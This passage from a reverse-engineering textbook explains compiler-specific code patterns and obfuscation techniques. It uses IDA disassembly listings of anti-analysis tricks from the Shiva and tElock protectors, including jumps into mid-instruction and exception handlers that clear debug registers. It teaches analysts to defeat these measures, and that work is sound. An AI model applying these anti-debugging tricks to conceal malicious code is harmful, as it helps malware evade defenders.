Debug vs. Release Binaries

Microsoft’s Visual Studio projects are usually capable of building either debug

or release versions of program binaries. One way to note the differences is to

compare the build options specified for the debug version of a project to the

build options specified for the release version. Simple differences include

the fact that release versions are generally optimized,7 while debug versions

are not, and debug versions are linked with additional symbol information

and debugging versions of the runtime library, while release versions are not.

The addition of debugging-related symbols allows debuggers to map assembly

language statements back to their source code counterparts and to deter-

mine the names of local variables.8 Such information is typically lost during

the compilation process. The debugging versions of Microsoft’s runtime

libraries have also been compiled with debugging symbols included, optimi-

zations disabled, and additional safety checks enabled to verify that some

function parameters are valid.

When disassembled using IDA, debug builds of Visual Studio projects

look significantly different from release builds. This is a result of compiler

and linker options specified only in debug builds, such as basic runtime

checks (/RTCx9), which introduce extra code into the resulting binary.

A side effect of this extra code is that it defeats IDA’s startup signature-

matching process, resulting in IDA’s frequent failure to automatically

locate main in debug builds of binaries.

One of the first differences you may notice in a debug build of a binary is

that virtually all functions are reached via jump functions (also known as thunk

functions), as shown in the following code fragments:

\ .text:00411050 sub_411050 proc near ; CODE XREF: start_0+3Èp

.text:00411050 ]jmp sub_412AE0

.text:00411050 sub_411050 endp

...

X .text:0041110E start proc near

7. Optimization generally involves elimination of redundancy in code or selection of faster, but

potentially larger, sequences of code in order to satisfy a developer’s desire to create either

faster or smaller executable files. Optimized code may not be as straightforward to analyze as

nonoptimized code and may therefore be considered a bad choice for use during a program’s

development and debugging phases.

8. gcc also offers the ability to insert debugging symbols during the compilation process.

9. See http://msdn.microsoft.com/en-us/library/8wtf2dfz.aspx.

Compiler Personalities 429

.text:0041110E Yjmp start_0

.text:0041110E start endp

...

Z .text:00411920 start_0 proc near ; CODE XREF: startÇj

.text:00411920 push ebp

.text:00411921 mov ebp, esp

.text:00411923 [call sub_411050

.text:00411928 call sub_411940

.text:0041192D pop ebp

.text:0041192E retn

.text:0041192E start_0 endp

In this example, the program entry point X does nothing other than

jump Y to the actual startup function Z. The startup function, in turn, calls

[ another function \, which simply jumps ] to the actual implementation

of that function. The two functions X and \ that contain nothing but a sin-

gle jump statement are called thunk functions. The heavy use of thunk func-

tions in debug binaries is one of the obstacles to IDA’s signature-matching

process. While the presence of thunk functions may briefly slow down your

analysis, using the techniques described in the previous section, it is still pos-

sible to track down the main function of the binary.

The basic runtime checks in a debug build cause several additional

operations to be performed upon entry to any function. An example of

an extended prologue in a debug build is shown here:

.text:00411500 push ebp

.text:00411501 mov ebp, esp

.text:00411503 Xsub esp, 0F0h

.text:00411509 push ebx

.text:0041150A push esi

.text:0041150B push edi

.text:0041150C Ylea edi, [ebp+var_F0]

.text:00411512 mov ecx, 3Ch

.text:00411517 mov eax, 0CCCCCCCCh

.text:0041151C rep stosd

.text:0041151E Zmov [ebp+var_8], 0

.text:00411525 mov [ebp+var_14], 1

.text:0041152C mov [ebp+var_20], 2

.text:00411533 mov [ebp+var_2C], 3

The function in this example utilizes four local variables that should

require only 16 bytes of stack space. Instead we see that this function allocates

240 bytes X of stack space and then proceeds to fill each of the 240 bytes

with the value 0xCC. The four lines starting at Y equate to the following func-

tion call:

memset(&var_F0, 0xCC, 240);

The byte value 0xCC corresponds to the x86 opcode for int 3, which is a

software interrupt that causes a program to trap to a debugger. The intent of

filling the stack frame with an overabundance of 0xCC values may be to ensure

430 Chapter 20

that the debugger is invoked in the event that the program somehow attempts

to execute instructions from the stack (an error condition that one would

hope to catch in a debug build).

The function’s local variables are initialized beginning at Z, where we

note that the variables are not adjacent to one another. The intervening space

will have been filled with the value 0xCC by the preceding memset operation.

Providing extra space between variables in this manner can make it easier to

detect overflows from one variable that may spill into and corrupt another

variable. Under normal conditions, none of the 0xCC values used as filler,

outside of any declared variables, should be overwritten. For comparison

purposes, the release version of the same code is shown here:

.text:004018D0 push ebp

.text:004018D1 mov ebp, esp

.text:004018D3 Xsub esp, 10h

.text:004018D6 Ymov [ebp+var_4], 0

.text:004018DD mov [ebp+var_C], 1

.text:004018E4 mov [ebp+var_8], 2

.text:004018EB mov [ebp+var_10], 3

In the release version we see that only the required amount of space is

requested for local variables X and that all four local variables are adjacent

to one another Y. Also note that the use of 0xCC as a filler value has been

eliminated.

Alternative Calling Conventions

In Chapter 6, we discussed the most common calling conventions utilized

in C and C++ code. While adherence to a published calling convention is

crucial when attempting to interface one compiled module to another, noth-

ing prohibits the use of custom calling conventions by functions within a sin-

gle module. This is commonly seen in highly optimized functions that are not

designed to be called from outside the module in which they reside.

The following code represents the first four lines of a function that uses

a nonstandard calling convention:

.text:000158AC sub_158AC proc near

.text:000158AC

X .text:000158AC arg_0 = dword ptr 4

.text:000158AC

.text:000158AC push [esp+arg_0]

.text:000158B0 Ymov edx, [eax+118h]

.text:000158B6 push eax

.text:000158B7 Zmovzx ecx, cl

.text:000158BA mov cl, [edx+ecx+0A0h]

Compiler Personalities 431

According to IDA’s analysis, only one argument X exists in the function’s

stack frame. However, upon closer inspection of the code, you can see that

both the EAX register Y and the CL register Z are used without any initial-

ization taking place within the function. The only possible conclusion is that

both EAX and CL are expected to be initialized by the caller. Therefore, you

should view this function as a three-argument function rather than a single-

argument function, and you must take special care when calling it to ensure

that the three arguments are all in their proper places.

IDA allows you to specify custom calling conventions for any function by

setting the function’s “type.” This is done by entering the function’s proto-

type via the EditFunctionsSet function type menu option and using

IDA’s __usercall calling convention. Figure 20-1 shows the resulting dialog

used to set the type for sub_158AC in the preceding example.

Figure 20-1: Designating a function as __usercall

For clarity, the declaration is shown again here:

int __usercall sub_158AC<eax>(struc_1 *<eax>, unsigned __int8 index<cl>, int)

Here the IDA keyword __usercall is used in place of one of the standard

calling conventions such as __cdecl or __stdcall. The use of __usercall requires

us to tell IDA the name of the register used to hold the function’s return

value by appending the register name to the name of the function (yielding

sub_158AC<eax> in this case). If the function returns no value, the return regis-

ter may be omitted. Within the parameter list, each register-based parameter

must also be annotated by appending the corresponding register name to

the parameter’s data type. After the function’s type has been set, IDA propa-

gates parameter information to calling functions, which results in improved

commenting of function call sequences as shown in the following listing:

.text:00014B9F Xlea eax, [ebp+var_218] ; struc_1 *

.text:00014BA5 Ymov cl, 1 ; index

.text:00014BA7 Zpush edx ; int

.text:00014BA8 call sub_158AC

Here it is clear that IDA recognizes that EAX will hold the first argument

to the function X, CL will hold the second argument Y, and the third argu-

ment will placed on the stack Z.

432 Chapter 20

To demonstrate that calling conventions can vary widely even with a sin-

gle executable, a second example using a custom calling convention is taken

from the same binary file and shown here:

.text:0001669E sub_1669E proc near

.text:0001669E

X .text:0001669E arg_0 = byte ptr 4

.text:0001669E

.text:0001669E Ymov eax, [esi+18h]

.text:000166A1 add eax, 684h

.text:000166A6 cmp [esp+arg_0], 0

Here again, IDA has indicated that the function accesses only one argu-

ment X within the stack frame. Closer inspection makes it quite clear that

the ESI register Y is also expected to be initialized prior to calling this func-

tion. This example demonstrates that even with the same binary file, the reg-

isters chosen to hold register-based arguments may vary from function to

function.

The lesson to be learned here is to make certain that you understand

how each register used in a function is initialized. If a function makes use of

a register prior to initializing that register, then the register is being used to

pass a parameter. Please refer to Chapter 6 for a review of which registers are

used by various compilers and common calling conventions.

Summary

The number of compiler-specific behaviors is too numerous to cover in a sin-

gle chapter (or even a single book for that matter). Among other behaviors,

compilers differ in the algorithms they employ to implement various high-

level constructs and the manner in which they choose to optimize generated

code. Because a compiler’s behavior is heavily influenced by the options sup-

plied to the compiler during the build process, it is possible for one compiler

to generate radically different binaries when fed the same source but differ-

ent build options. Unfortunately, learning to cope with all of these variations

is usually a matter of experience. Further complicating matters is the fact

that it often very difficult to search for help on specific assembly language

constructs, as it is very difficult to craft search expressions that will yield results

specific to your particular case. When this happens, your best resource is gen-

erally a forum dedicated to reverse engineering in which you can post code

and benefit from the knowledge of others who have had similar experiences.

JMP

EBP

SUB

OBFUSCATED CODE ANALYSIS

Even under ideal circumstances, compre-

hending a disassembly listing is a difficult

task at best. High-quality disassemblies are

essential for anyone contemplating digging into

the inner workings of a binary, which is precisely why

we have spent the last 20 chapters discussing IDA Pro

and its capabilities. It can be argued that IDA is so effective at what it does

that it has lowered the barriers for entry into the binary analysis field. While

certainly not attributable to IDA alone, the fact that the state of binary reverse

engineering has advanced so far in recent years is not lost on anyone who does

not want his software to be analyzed. Thus, over the last several years, an

arms race of sorts has been taking place between reverse engineers and pro-

grammers who wish to keep their code secret. In this chapter we will examine

IDA’s role in this arms race and discuss some of the measures that have been

taken to protect code, along with how to defeat those measures using IDA.

Various dictionary definitions will inform you that obfuscation is the act of

making something obscure, perplexing, confusing, or bewildering in order

to prevent others from understanding the obfuscated item. Anti–reverse

434 Chapter 21

engineering, on the other hand, encompasses a broader range of techniques

(obfuscation being one of them) designed to hinder analysis of an item. In

the context of this book and the use of IDA, the items to which such anti–

reverse engineering techniques may be applied are binary executable files (as

opposed to source files or silicon chips, for example).

In order to consider the impact of obfuscation, and anti–reverse engineer-

ing techniques in general, on the use of IDA, it is first useful to categorize

some of these techniques in order to understand exactly how each may man-

ifest itself. It is important to note that there is no one correct way to catego-

rize each technique, as the general categories that follow often overlap in

their descriptions. In addition, new anti–reverse engineering techniques are

under continuous development, and it is not possible to provide a single, all-

inclusive list.

Anti–Static Analysis Techniques

The primary purpose of anti–static analysis techniques is to prevent an analyst

from understanding the nature of a program without actually running the

program. These are precisely the types of techniques that target disassemblers

such as IDA and are thus of greatest concern if IDA is your weapon of choice

for reverse engineering binaries. Several types of anti–static analysis techniques

are discussed here.

Disassembly Desynchronization

One of the older techniques designed to frustrate the disassembly process

involves the creative use of instructions and data to prevent the disassembly

from finding the correct starting address for one or more instructions. Forcing

the disassembler to lose track of itself in this manner usually results in a failed

or, at a minimum, incorrect disassembly listing.

The following listing shows IDA’s efforts to disassemble a portion of the

Shiva1 anti–reverse engineering tool:

LOAD:0A04B0D1 call Xnear ptr loc_A04B0D6+1

LOAD:0A04B0D6

LOAD:0A04B0D6 loc_A04B0D6: ; CODE XREF: start+11Èp

Y LOAD:0A04B0D6 mov dword ptr [eax-73h], 0FFEB0A40h

LOAD:0A04B0D6 start endp

LOAD:0A04B0D6

LOAD:0A04B0DD

LOAD:0A04B0DD loc_A04B0DD: ; CODE XREF: LOAD:0A04B14CÈj

LOAD:0A04B0DD loopne loc_A04B06F

LOAD:0A04B0DF mov dword ptr [eax+56h], 5CDAB950h

Z LOAD:0A04B0E6 iret

LOAD:0A04B0E6 ;---------------------------------------------------------------

[ LOAD:0A04B0E7 db 47h

LOAD:0A04B0E8 db 31h, 0FFh, 66h

1. Shaun Clowes and Neel Mehta first introduced Shiva at CanSecWest in 2003. See http://

www.cansecwest.com/core03/shiva.ppt.

Obfuscated Code Analysis 435

LOAD:0A04B0EB ;---------------------------------------------------------------

LOAD:0A04B0EB

LOAD:0A04B0EB loc_A04B0EB: ; CODE XREF: LOAD:0A04B098Çj

LOAD:0A04B0EB mov edi, 0C7810D98h

This example executes a call X (a jump can just as easily be used) into

the middle of an existing instruction Y. Since the function call is assumed to

return, the succeeding instruction at address 0A04B0D6 Y is disassembled

(incorrectly). The actual target of the call instruction, loc_A04B0D6+1 (0A04B0D7),

cannot be disassembled because the associated bytes have already been

incorporated into the 5-byte instruction at 0A04B0D6. Assuming we notice that

this is taking place, the remainder of the disassembly must be considered

suspect. Evidence of this fact shows up in the form of unexpected user-space

instructions Z (in this case an iret2) and miscellaneous databytes [.

Note that this type of behavior is not restricted to IDA. Virtually all

disassemblers, whether they utilize a recursive descent algorithm or a linear

sweep algorithm, fall victim to this technique.

The proper way to deal with this situation in IDA is to undefine the

instruction that contains the bytes that are the target of the call and then

define an instruction at the call target address in an attempt to resynchronize

the disassembly. Of course, the use of an interactive disassembler greatly sim-

plifies this process. Using IDA, a quick EditUndefine (hotkey U) with the

cursor positioned at X followed by an EditCode (hotkey C) with the cursor

repositioned on address 0A04B0D7 results in the listing shown here:

LOAD:0A04B0D1 call loc_A04B0D7

LOAD:0A04B0D1 ;------------------------------------------------------------

X LOAD:0A04B0D6 db 0C7h ; ¦

LOAD:0A04B0D7 ;------------------------------------------------------------

LOAD:0A04B0D7

LOAD:0A04B0D7 loc_A04B0D7: ; CODE XREF: start+11Çp

Y LOAD:0A04B0D7 pop eax

LOAD:0A04B0D8 lea eax, [eax+0Ah]

LOAD:0A04B0DB

LOAD:0A04B0DB loc_A04B0DB: ; CODE XREF: start:loc_A04B0DBÇj

Z LOAD:0A04B0DB jmp short near ptr loc_A04B0DB+1

LOAD:0A04B0DB start endp

LOAD:0A04B0DB

LOAD:0A04B0DB ;------------------------------------------------------------

LOAD:0A04B0DD db 0E0h ; a

At this point, it is somewhat more obvious that the byte at address 0A04B0D6

X is never executed. The instruction at 0A04B0D7 Y (the target of the call) is

used to clear the return address (from the bogus call) off the stack, and

execution continues. Note that is does not take long before the technique is

used again, this time using a 2-byte jump instruction at address 0A04B0DB Z,

which actually jumps into the middle of itself. Here again, we are obligated

2. The x86 iret instruction is used to return from an interrupt-handling routine. Interrupt-

handling routines are most often found in kernel space.

436 Chapter 21

to undefine an instruction in order to get to the start of the next instruction.

One more application of the undefine (at 0A04B0DB) and redefine (at 0A04B0DC)

processes yields the following disassembly:

Y LOAD:0A04B0D7 pop eax

Z LOAD:0A04B0D8 lea eax, [eax+0Ah]

LOAD:0A04B0D8 ; --------------------------------------------------------------

LOAD:0A04B0DB db 0EBh ; d

LOAD:0A04B0DC ; --------------------------------------------------------------

X LOAD:0A04B0DC jmp eax

LOAD:0A04B0DC start endp

The target of the jump instruction turns out to be yet another jump

instruction X. In this case, however, the jump is impossible for a disassem-

bler (and potentially confusing to the human analyst) to follow, as the target

of the jump is contained in a register (EAX) and computed at runtime. This

is an example of another type of anti–static analysis technique, discussed in

“Dynamically Computed Target Addresses” on page 437. In this case the value

contained in the EAX register is not difficult to determine given the relatively

simple instruction sequence that precedes the jump. The pop instruction at

Yloads the return address from the call instruction in the previous example

(0A04B0D6) into the EAX register, while the following instruction Z has the

effect of adding 10 to EAX. Thus the target of the jump instruction is 0A04B0E0,

and this is the address at which we must resume the disassembly process.

The final example of desynchronization taken from a different binary

demonstrates how processor flags may be utilized to turn conditional jumps

into absolute jumps. The following disassembly demonstrates the use of the

x86 Z flag for just such a purpose:

X .text:00401000 xor eax, eax

Y .text:00401002 jz short near ptr loc_401009+1

Z .text:00401004 mov ebx, [eax]

[ .text:00401006 mov [ecx-4], ebx

.text:00401009

.text:00401009 loc_401009: ; CODE XREF: .text:00401002Çj

\ .text:00401009 call near ptr 0ADFEFFC6h

.text:0040100E ficom word ptr [eax+59h]

Here, the xor instruction X is used to zero the EAX register and set the

x86 Z flag. The programmer, knowing that the Z flag is set, utilizes a jump-on-

zero (jz) instruction Y, which will always be taken, to attain the effect of an

unconditional jump. As a result, the instructions Z and [ between the jump

and the jump target will never be executed and serve only to confuse any

analyst who fails to realize this fact. Note that, once again, this example

Obfuscated Code Analysis 437

obscures the actual jump target by jumping into the middle of an instruction

\. Properly disassembled, the code should read as follows:

.text:00401000 xor eax, eax

.text:00401002 jz short loc_40100A

.text:00401004 mov ebx, [eax]

.text:00401006 mov [ecx-4], ebx

.text:00401006 ; -------------------------------------------------------------

Y .text:00401009 db 0E8h ; F

.text:0040100A ; -------------------------------------------------------------

.text:0040100A

.text:0040100A loc_40100A: ; CODE XREF: .text:00401002Çj

X .text:0040100A mov eax, 0DEADBEEFh

.text:0040100F push eax

.text:00401010 pop ecx

The actual target of the jump X has been revealed, as has the extra byte Y

that caused the desynchronization in the first place. It is certainly possible to

use far more roundabout ways of setting and testing flags prior to executing a

conditional jump. The level of difficulty for analyzing such code increases

with the number of operations that may affect the CPU flag bits prior to

testing their value.

Dynamically Computed Target Addresses

Do not confuse the title of this section with an anti–dynamic analysis tech-

nique. The phrase dynamically computed simply means that an address to which

execution will flow is computed at runtime. In this section we discuss several

ways in which such an address can be derived. The intent of such techniques is

to hide (obfuscate) the actual control flow path that a binary will follow from

the prying eyes of the static analysis process.

One example of this technique was shown in the preceding section. The

example used a call statement to place a return address on the stack. The

return address was popped directly off the stack into a register, and a constant

value was added to the register to derive the final target address, which was

ultimately reached by performing a jump to the location specified by the reg-

ister contents.

An infinite number of similar code sequences can be developed for

deriving a target address and transferring control to that address. The follow-

ing code, which wraps up the initial startup sequence in Shiva, demonstrates

an alternate method for dynamically computing target addresses:

LOAD:0A04B3BE mov ecx, 7F131760h ; ecx = 7F131760

LOAD:0A04B3C3 xor edi, edi ; edi = 00000000

LOAD:0A04B3C5 mov di, 1156h ; edi = 00001156

LOAD:0A04B3C9 add edi, 133AC000h ; edi = 133AD156

LOAD:0A04B3CF xor ecx, edi ; ecx = 6C29C636

438 Chapter 21

LOAD:0A04B3D1 sub ecx, 622545CEh ; ecx = 0A048068

LOAD:0A04B3D7 mov edi, ecx ; edi = 0A048068

LOAD:0A04B3D9 pop eax

LOAD:0A04B3DA pop esi

LOAD:0A04B3DB pop ebx

LOAD:0A04B3DC pop edx

LOAD:0A04B3DD pop ecx

X LOAD:0A04B3DE xchg edi, [esp] ; TOS = 0A048068

LOAD:0A04B3E1 retn ; return to 0A048068

The comments in the right-hand margin document the changes being

made to various CPU registers at each instruction. The process culminates in

a derived value being moved into the top position of the stack (TOS) X, which

causes the return instruction to transfer control to the computed location

(0A048068 in this case). Code sequences such as these can significantly increase

the amount of work that must be performed during static analysis, as the

analyst must essentially run the code by hand to determine the actual control

flow path taken in the program.

Much more complex types of control flow hiding have been developed

and utilized in recent years. In the most complex cases, a program will use

multiple threads or child processes to compute control flow information and

receive that information via some form of interprocess communication (for

child processes) or synchronization primitives (for multiple threads). In such

cases, static analysis can become extremely difficult, as it becomes necessary

to understand not only the behavior of multiple executable entities but also

the exact manner by which those entities exchange information. For example,

one thread may wait on a shared semaphore3 object, while a second thread

computes values or modifies code that the first thread will make use of once

the second thread signals its completion via the semaphore.

Another technique, frequently used within Windows-oriented malware,

involves configuring an exception handler,4 intentionally triggering an

exception, and then manipulating the state of the process’s registers while

handling the exception. The following example is used by the tElock anti–

reverse engineering tool to obscure the program’s actual control flow:

X .shrink:0041D07A call $+5

Y .shrink:0041D07F pop ebp

Z .shrink:0041D080 lea eax, [ebp+46h] ; eax holds 0041D07F + 46h

.shrink:0041D081 inc ebp

[ .shrink:0041D083 push eax

.shrink:0041D084 xor eax, eax

\ .shrink:0041D086 push dword ptr fs:[eax]

] .shrink:0041D089 mov fs:[eax], esp

3. Think of a semaphore as a token that must be in your possession before you can enter a room to

perform some action. While you hold the token, no other person may enter the room. When

you have finished with your task in the room, you may leave and give the token to someone else,

who may then enter the room and take advantage of the work you have done (without your

knowledge because you are no longer in the room!). Semaphores are often used to enforce

mutual exclusion locks around code or data in a program.

4. For more information on Windows Structured Exception Handling (SEH), see http://

www.microsoft.com/msj/0197/exception/exception.aspx.

Obfuscated Code Analysis 439

^ .shrink:0041D08C int 3 ; Trap to Debugger

.shrink:0041D08D nop

.shrink:0041D08E mov eax, eax

.shrink:0041D090 stc

.shrink:0041D091 nop

.shrink:0041D092 lea eax, ds:1234h[ebx*2]

.shrink:0041D099 clc

.shrink:0041D09A nop

.shrink:0041D09B shr ebx, 5

.shrink:0041D09E cld

.shrink:0041D09F nop

.shrink:0041D0A0 rol eax, 7

.shrink:0041D0A3 nop

.shrink:0041D0A4 nop

_ .shrink:0041D0A5 xor ebx, ebx

` .shrink:0041D0A7 div ebx ; Divide by zero

.shrink:0041D0A9 pop dword ptr fs:0

The sequence begins by using a call X to the next instruction Y; the

call instruction pushes 0041D07F onto the stack as a return address, which is

promptly popped off the stack into the EBP register Y. Next Z, the EAX

pushed onto the stack [ as the address of an exception handler function.

The remainder of the exception handler setup takes place at \ and ],

which complete the process of linking the new exception handler into the

existing chain of exception handlers referenced by fs:[0].5 The next step is

to intentionally generate an exception ^, in this case an int 3, which is a soft-

ware trap (interrupt) to the debugger. In x86 programs, the int 3 instruction

is used by debuggers to implement a software breakpoint. Normally at this

point, an attached debugger would gain control; in fact, if a debugger is

attached, it will have the first opportunity to handle the exception, thinking

that it is a breakpoint. In this case, the program fully expects to handle the

exception, so any attached debugger must be instructed to pass the exception

along to the program. Failing to allow the program to handle the exception

may result in an incorrect operation and possibly a crash of the program.

Without understanding how the int 3 exception is handled, it is impossible

to know what may happen next in this program. If we assume that execution

simply resumes following the int 3, then it appears that a divide-by-zero

exception will eventually be triggered by instructions _ and `.

The exception handler associated with the preceding code begins at

address 0041D0C5. The first portion of this function is shown here:

.shrink:0041D0C5 sub_41D0C5 proc near ; DATA XREF: .stack:0012FF9CÇo

.shrink:0041D0C5

.shrink:0041D0C5 pEXCEPTION_RECORD = dword ptr 4

.shrink:0041D0C5 arg_4 = dword ptr 8

X .shrink:0041D0C5 pCONTEXT = dword ptr 0Ch

5. Windows configures the FS register to point to the base address of the current thread’s

environment block (TEB). The first item (offset zero) in a TEB is the head of a linked list of

pointers to exception handler functions, which are called in turn when an exception is raised

in a process.

440 Chapter 21

.shrink:0041D0C5

[ .shrink:0041D0C5 mov eax, [esp+pEXCEPTION_RECORD]

Y .shrink:0041D0C9 mov ecx, [esp+pCONTEXT] ; Address of SEH CONTEXT

Z .shrink:0041D0CD inc [ecx+CONTEXT._Eip] ; Modify saved eip

\ .shrink:0041D0D3 mov eax, [eax] ; Obtain exception type

] .shrink:0041D0D5 cmp eax, EXCEPTION_INT_DIVIDE_BY_ZERO

.shrink:0041D0DA jnz short loc_41D100

.shrink:0041D0DC inc [ecx+CONTEXT._Eip] ; Modify eip again

^ .shrink:0041D0E2 xor eax, eax ; Zero x86 debug registers

.shrink:0041D0E4 and [ecx+CONTEXT.Dr0], eax

.shrink:0041D0E7 and [ecx+CONTEXT.Dr1], eax

.shrink:0041D0EA and [ecx+CONTEXT.Dr2], eax

.shrink:0041D0ED and [ecx+CONTEXT.Dr3], eax

.shrink:0041D0F0 and [ecx+CONTEXT.Dr6], 0FFFF0FF0h

.shrink:0041D0F7 and [ecx+CONTEXT.Dr7], 0DC00h

.shrink:0041D0FE jmp short locret_41D160

The third argument X to the exception handler function is a pointer to

a Windows CONTEXT structure (defined in the Windows API header file winnt.h).

The CONTEXT structure is initialized with the contents of all CPU registers as

they existed at the time of the exception. An exception handler has the

opportunity to inspect and, if desired, modify the contents of the CONTEXT

structure. If the exception handler feels that it has corrected the problem

that led to the exception, it can notify the operating system that the offending

thread should be allowed to continue. At this point the operating system

reloads the CPU registers for the thread from the CONTEXT structure that was

provided to the exception handler, and execution of the thread resumes as

if nothing had ever happened.

In the preceding example, the exception handler begins by accessing

the thread’s CONTEXT Y in order to increment the instruction pointer Z,

thus moving beyond the instruction that generated the exception. Next,

the exception’s type code (a field within the provided EXCEPTION_RECORD [) is

retrieved \ in order to determine the nature of the exception. This portion

of the exception handler deals with the divide-by-zero error ], generated

in the previous example, by zeroing ^ all of the x86 hardware debugging

registers.6 Without examining the remainder of the tElock code, it is not

immediately apparent why the debug registers are being cleared. In this

case, tElock is clearing values from a previous operation in which it used

the debug registers to set four breakpoints in addition to the int 3 seen pre-

viously. In addition to obfuscating the true flow of the program, clearing or

modifying the x86 debug registers can wreak havoc with software debuggers

such as OllyDbg or IDA’s own internal debugger. Such anti-debugging tech-

niques are discussed in “Anti–Dynamic Analysis Techniques” on page 449.

Opcode Obfuscation

While the techniques described to this point may provide—in fact, are

intended to provide—a hindrance to understanding a program’s control

6. In the x86, debug registers 0 through 7 (Dr0 through Dr7) are used to control the use of

hardware-assisted breakpoints. Dr0 through Dr3 are used to specify breakpoint addresses,

while Dr6 and Dr7 are used to enable and disable specific hardware breakpoints.

Obfuscated Code Analysis 441

flow, none prevent you from observing the correct disassembled form of a

program you are analyzing. Desynchronization had the greatest impact on

the disassembly, but it was easily defeated by reformatting the disassembly to

reflect the correct instruction flow.

A more effective technique for preventing correct disassembly is to encode

or encrypt the actual instructions when the executable file is being created.

The obfuscated instructions are useless to the CPU and must be de-obfuscated

back to their original form before they are fetched for execution by the CPU.

Therefore, at least some portion of the program must remain unencrypted

in order to serve as the startup routine, which, in the case of an obfuscated

program, is usually responsible for de-obfuscating some or all of the remainder

of the program. A very generic overview of the obfuscation process is shown

in Figure 21-1.

Figure 21-1: Generic obfuscation process

As shown, the input to the process is a program that a user wishes to

obfuscate for some reason. In many cases, the input program is written using

standard programming languages and build tools (editors, compilers, and the

like) with little thought required about the obfuscation to come. The resulting

executable file is fed into an obfuscation utility, which transforms the binary

into a functionally equivalent, yet obfuscated, binary. As depicted, the obfusca-

tion utility is responsible for obfuscating the original program’s code and

data sections and adding additional code (a de-obfuscation stub) that per-

forms the task of de-obfuscating the code and data before the original func-

tionality can be accessed at runtime. The obfuscation utility also modifies the

program headers to redirect the program entry point to the de-obfuscation

stub, ensuring that execution begins with the de-obfuscation process. Follow-

ing de-obfuscation, execution typically transfers to the entry point of the

original program, which begins execution as if it had never been obfuscated

at all.

This oversimplified process varies widely based on the obfuscation util-

ity that is used to create the obfuscated binary. An ever-increasing number

of utilities are available to handle the obfuscation process. Such utilities offer

features ranging from compression to anti-disassembly and anti-debugging

techniques. Examples include programs such as UPX7 (compressor, also works

with ELF), ASPack8 (compressor), ASProtect (anti–reverse engineering by the

7. See http://upx.sourceforge.net/.

8. See http://www.aspack.com/.

Original Program

Header

Code

Data

Obfuscated Program

Header

Obfuscated code

Obfuscated data

De-obfuscation stub

Entry

point

Modified

entry

point

Transfer to

original entry

point (OEP)

Obfuscator

442 Chapter 21

makers of ASPack), and tElock9 (compression and anti–reverse engineering)

for Windows PE files, and Burneye10 (encryption) and Shiva11 (encryption

and anti-debugging) for Linux ELF binaries. The capabilities of obfuscation

utilities have advanced to the point that some anti–reverse engineering tools

such as WinLicense12 provide more integration throughout the entire build

process, allowing programmers to integrate anti–reverse engineering fea-

tures at every step, from source code through post-processing the compiled

binary file.

A more recent evolution in the world of obfuscation programs involves

wrapping the original executable with a virtual machine execution engine.

Depending on the sophistication of the virtualizing obfuscator, the original

machine code may never execute directly; instead that code is interpreted

by a byte code–oriented virtual machine. Very sophisticated virtualizers are

capable of generating unique virtual machine instances each time they run,

making it difficult to create an all-purpose de-obfuscation algorithm to defeat

them. VMProtect13 is one example of a virtualizing obfuscator. VMProtect

was used to obfuscate the Clampi14 trojan.

As with any offensive technology, defensive measures have been developed

to counter many anti–reverse engineering tools. In most cases the goal of

such tools is to recover the original, unprotected executable file (or a reason-

able facsimile), which can then be analyzed using more traditional tools such

as disassemblers and debuggers. One such tool designed to de-obfuscate

Windows executables is called QuickUnpack.15 QuickUnpack, like many

other automated unpackers, operates by functioning as a debugger and

allowing an obfuscated binary to execute through its de-obfuscation phase

and then capturing the process image from memory. Beware that this type of

tool actually runs potentially malicious programs in the hope of intercepting

the execution of those programs after they have unpacked or de-obfuscated

themselves but before they have a chance to do anything malicious. Thus,

you should always execute such programs in a sandbox-type environment.

Using a purely static analysis environment to analyze obfuscated code is

a challenging task at best. Without being able to execute the de-obfuscation

stub, some means of unpacking or decrypting the obfuscated portions of

the binary must be employed before disassembly of the obfuscated code can

begin. Figure 21-2 shows the layout of an executable that has been packed

using the UPX packer. The only portion of the address space that IDA has

identified as code is the thin stripe at X, which happens to be the UPX

decompression stub.

9. See http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/Telock.shtml.

10. See http://www.packetstormsecurity.org/groups/teso/indexdate.html.

11. See http://www.cansecwest.com/core03/shiva.ppt (tool: http://www.securiteam.com/tools/

5XP041FA0U.html).

12. See http://www.oreans.com/winlicense.php.

13. See http://www.vmpsoft.com/.

14. See http://www.symantec.com/connect/blogs/inside-jaws-trojanclampi.

15. See http://qunpack.ahteam.org/wp2/ (Russian) or http://www.woodmann.com/collaborative/tools/

index.php/Quick_Unpack.

Obfuscated Code Analysis 443

Figure 21-2: IDA navigation band for a binary packed using UPX

Examination of the contents of the address space would reveal empty

space to the left of Y and apparently random data in the region between X

and Y. The random data is the result of the UPX compression process, and

the job of the decompression stub is to unpack that data into the empty

region at the left of the navigation band before finally transferring control

to the unpacked code. Note that the unusual appearance of the navigation

band is a potential tip-off that this binary has been obfuscated in some man-

ner. In fact, a number of things typically stand out when viewing an obfus-

cated binary with IDA. Some potential tip-offs that a binary is obfuscated

include the following:

zVery little code is highlighted in the navigation band.

zVery few functions are listed in the Functions window. Often only the

start function will appear.

zVery few imported functions are listed in the Imports window.

zVery few legible strings appear in the Strings window (not opened by

default). Often only the names of the few imported libraries and func-

tions will be visible.

zOne or more program sections will be both writable and executable.

zNonstandard section names such as UPX0 or .shrink are used.



SANDBOX ENVIRONMENTS

The purpose of a sandbox environment for reverse engineering is to allow you to

execute a program in a manner that allows observation of the program’s behavior

without allowing that behavior to adversely impact critical components of your

reverse engineering platform. Sandbox environments are commonly constructed

using platform virtualization software such asd VMware,* but they may be con-

structed on dedicated systems that are capable of being restored to a known good

state following the execution of any malware.

A common feature of sandbox systems is the fact that they are typically heavily

instrumented in order to observe and collect information on the behavior of programs

run within the sandbox. Collected data may include information on the file system

activity of a program, on the registry activity of a (Windows) program, and about

any networking activity generated by the program.

*See http://www.vmware.com/.

444 Chapter 21

The information presented in the navigation band can be correlated

with the properties of each segment within the binary to determine whether

the information presented in each display is consistent. The segments listing

for this binary is shown here:

Name Start End R W X D L Align Base Type Class

X UPX0 00401000 00407000 R W X . L para 0001 public CODE

Y UPX1 00407000 00409000 R W X . L para 0002 public CODE

UPX2 00409000 0040908C R W . . L para 0003 public DATA

.idata 0040908C 004090C0 R W . . L para 0003 public XTRN

UPX2 004090C0 0040A000 R W . . L para 0003 public DATA

In this case, the entire range of addresses comprising segment UPX0 X

and segment UPX1 Y (00401000-00409000) is marked as executable (the X flag

is set). Given this fact, we should expect to see the entire navigation band

colorized to represent code. The fact that we do not, coupled with the fact

that inspection reveals the entire range of UPX0 to be empty, should be con-

